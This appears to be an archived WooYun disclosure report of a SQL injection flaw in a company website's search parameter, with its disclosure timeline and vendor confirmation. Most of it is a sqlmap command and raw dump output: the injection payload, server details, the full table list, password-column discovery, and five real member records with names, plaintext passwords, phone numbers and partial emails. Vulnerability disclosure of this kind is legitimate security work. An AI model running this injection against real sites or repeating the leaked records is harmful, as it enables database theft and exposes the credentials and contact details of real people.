乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
歐普達資訊有限公司主站存在SQL注射漏洞(5W用户明文密码电话号码邮箱地址)
地址:http://**.**.**.**/seach.php?seach_city=0&search_word=H&
$ python sqlmap.py -u "http://**.**.**.**/seach.php?seach_city=0&search_word=H&" -p search_word --technique=B --random-agent --batch --no-cast -D lifeshow -T distributor -C userid,MemberName,passwd,Phone,Email --dump --start 1 --stop 5
back-end DBMS: MySQL 5Database: lifeshow+-------------+---------+| Table | Entries |+-------------+---------+| distributor | 49580 |+-------------+---------+
Database: lifeshowTable: distributor[5 entries]+----------+------------+---------+---------------+-------------------------+| userid | MemberName | passwd | Phone | Email |+----------+------------+---------+---------------+-------------------------+| U0031412 | Song Ming | c25357 | 852-2456-5588 | _life15@**.**.**.** || U0003743 | 蜜蜂咩咩 | 730617 | | [email protected] || U0029473 | 000000 | 073279 | 28222889 | 000000@**.**.**.** || U0034811 | 毛豆 | 0000123 | 23197286 | 0000123@**.**.**.** || U0003573 | 0008KQ | 0008kq | | 0008kq@**.**.**.** |+----------+------------+---------+---------------+-------------------------+
current user is DBA: Falsedatabase management system users [1]:[*] 'lifeshow'@'localhost'Database: lifeshow+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| store_kind | 773408 || e | 724585 || keyword_ip | 713428 || works | 357455 || public_usedcar_equip | 137003 || store_goldkind | 104875 || store2 | 74665 || store_search | 74622 || store | 74304 || distributor | 49580 || coupon_store_kind | 24579 || public_usedcar | 17090 || public_product | 16758 || productkind1 | 11188 || experience | 7345 || public_new2 | 3921 || video2 | 3906 || sponsored_links | 2933 || public_message | 2883 || lamp_news | 2480 || manager_silver | 1839 || count_index_check | 1669 || public_prod_dir | 1300 || public_ticket | 1293 || coupon_kind | 1262 || manager | 1138 || public_company | 1127 || productkindgold | 1126 || banner2 | 1114 || public_landscape | 919 || public_banner | 910 || usedcar_car_kind | 870 || news2 | 790 || bookmark | 743 || tmp | 698 || count_index | 692 || top_kind | 507 || store_popular | 421 || city | 396 || keywordlist | 394 || public_story | 320 || online_shop | 203 || d_login_session | 176 || top_keyword | 135 || quick_search_word | 118 || design2 | 109 || usedcar_link | 97 || experience_story | 78 || public_movie | 75 || usedcar_banner | 59 || forecast | 45 || activity_show | 44 || cover | 41 || sample | 40 || coupon_news | 39 || usedcar_car_color | 39 || usedcar_car_equip | 35 || kind_store | 28 || service | 24 || vote | 19 || beauty | 18 || lamp_banner | 17 || usedcar_car_kind2 | 14 || coupon_keyword | 13 || coupon_popular | 12 || top_kind_prod | 12 || cover_category | 11 || usedcar_car_color2 | 10 || videokind1 | 10 || count_index_week | 7 || usedcar_car_from | 7 || usedcar_car_select | 7 || coupon_banner | 6 || coupon_case | 6 || designkind1 | 6 || store_review | 5 || usedcar_text | 5 || activities | 4 || employees | 4 || lamp_hot_news | 4 || news1 | 4 || banner1 | 3 || login_sid | 3 || customerActivity | 2 || customerActivityRestriction | 2 || usedcar_car_brake | 2 || usedcar_car_suspension | 2 || authentication | 1 || climate | 1 || count_story | 1 || customerActivityMemberForm | 1 || public_acquaint | 1 || ratings | 1 || tv_show | 1 || webinfo | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1572 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 276 || SESSION_VARIABLES | 276 || STATISTICS | 188 || PARTITIONS | 134 || TABLES | 134 || COLLATION_CHARACTER_SET_APPLICABILITY | 128 || COLLATIONS | 127 || KEY_COLUMN_USAGE | 112 || TABLE_CONSTRAINTS | 110 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 18 || PLUGINS | 7 || ENGINES | 5 || PROCESSLIST | 4 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: lifeshowTable: distributor[1 column]+--------+| Column |+--------+| passwd |+--------+Database: lifeshowTable: employees[1 column]+----------+| Column |+----------+| password |+----------+Database: lifeshowTable: manager[1 column]+----------+| Column |+----------+| PassWord |+----------+Database: lifeshowTable: authentication[1 column]+--------+| Column |+--------+| passwd |+--------+sqlmap resumed the following injection point(s) from stored session:---Parameter: search_word (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: lifeshowTable: distributor[21 columns]+--------------+---------------+| Column | Type |+--------------+---------------+| Add_Date | date || Address | varchar(180) || Birthday | varchar(11) || Blog | varchar(200) || City | int(4) || Cityarea | int(4) || Email | varchar(60) || Friend | text || ID | int(11) || Interested | text || Introduction | text || MemberName | varchar(45) || Name | varchar(30) || passwd | varchar(50) || Phone | varchar(20) || pic | varchar(250) || Sex | varchar(2) || Silver | enum('N','Y') || Silver_Lock | enum('N','Y') || state | varchar(2) || userid | char(8) |+--------------+---------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: search_word (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: lifeshow+-------------+---------+| Table | Entries |+-------------+---------+| distributor | 49580 |+-------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: search_word (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5Database: lifeshowTable: distributor[5 entries]+----------+------------+---------+---------------+-------------------------+| userid | MemberName | passwd | Phone | Email |+----------+------------+---------+---------------+-------------------------+| U0031412 | Song Ming | c25357 | 852-2456-5588 | _life15@**.**.**.** || U0003743 | 蜜蜂咩咩 | 730617 | | [email protected] || U0029473 | 000000 | 073279 | 28222889 | 000000@**.**.**.** || U0034811 | 毛豆 | 0000123 | 23197286 | 0000123@**.**.**.** || U0003573 | 0008KQ | 0008kq | | 0008kq@**.**.**.** |+----------+------------+---------+---------------+-------------------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-12-03 22:47
感謝通報
暂无
